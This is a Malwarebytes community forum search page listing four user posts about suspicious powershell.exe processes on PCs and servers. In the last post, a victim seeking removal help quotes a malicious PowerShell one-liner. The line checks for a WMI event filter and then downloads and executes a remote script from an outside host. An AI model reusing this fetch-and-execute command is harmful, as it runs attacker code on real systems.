Jump to content

Search the Community

Showing results for tags 'powershell.exe'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

Found 4 results

  1. Dear Team, Recently few days back i had found the new malware in our work group computers. It is named powershell.exe, we can find it in task manager in processes tab. It utilizing more CPU it causes impact to all other applications running in the CPU. I had tried malwarebytes and some other antivirus tools but those are not detecting this bug. Please help us solve the issue. Malware programmers create files with virus codes and named it powershell.exe to spread malware on the internet. we need serious attention here to block and remove it in the network. Please help us to do it. Regards John.
  2. Hello, i have problem with powershell.exe it slow down my pc, but i dont know what to do to delete him, can anybody help me please? I saw few topics and i installed frst64 in attach are logs. Thank you. Addition.txt FRST.txt
  3. Hi, Recently we are seeing so many powershell.exe processes on the server box (running WebServer) , it chokes the server , sometimes we are just unable to even RDP the box. On the malwareBytes end , it pops up warning/alert regarding outgoing connection on xxxxx port by process powershell.exe Can you please suggest me a way to handle this. Thanks Sourabh
  4. Hi, I have to Windows servers (2008 and SBS2011) and both were infected with Y1.bat variant, I run some scripts and apparently I remove them from the system, actually I have Malwarebytes EndPoint installed and from time to time the anti-exploit shows a message blocking some IP address from access, but none people use this server as a workstation. Now apparently the malware comes again but with a differente variant and when I scan with Malwarebytes no infection appears, I download and Scan with the Anti-Rootkit and nothing appear. I see that the %temp% folders is redirected to a Temp\1 folder (same as the last time), not sure how to properly remove this thread. Any suggestion will be appreciated. Before I discover the following script that I properly remove: powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}" The following link explain how to remove it in the past: https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.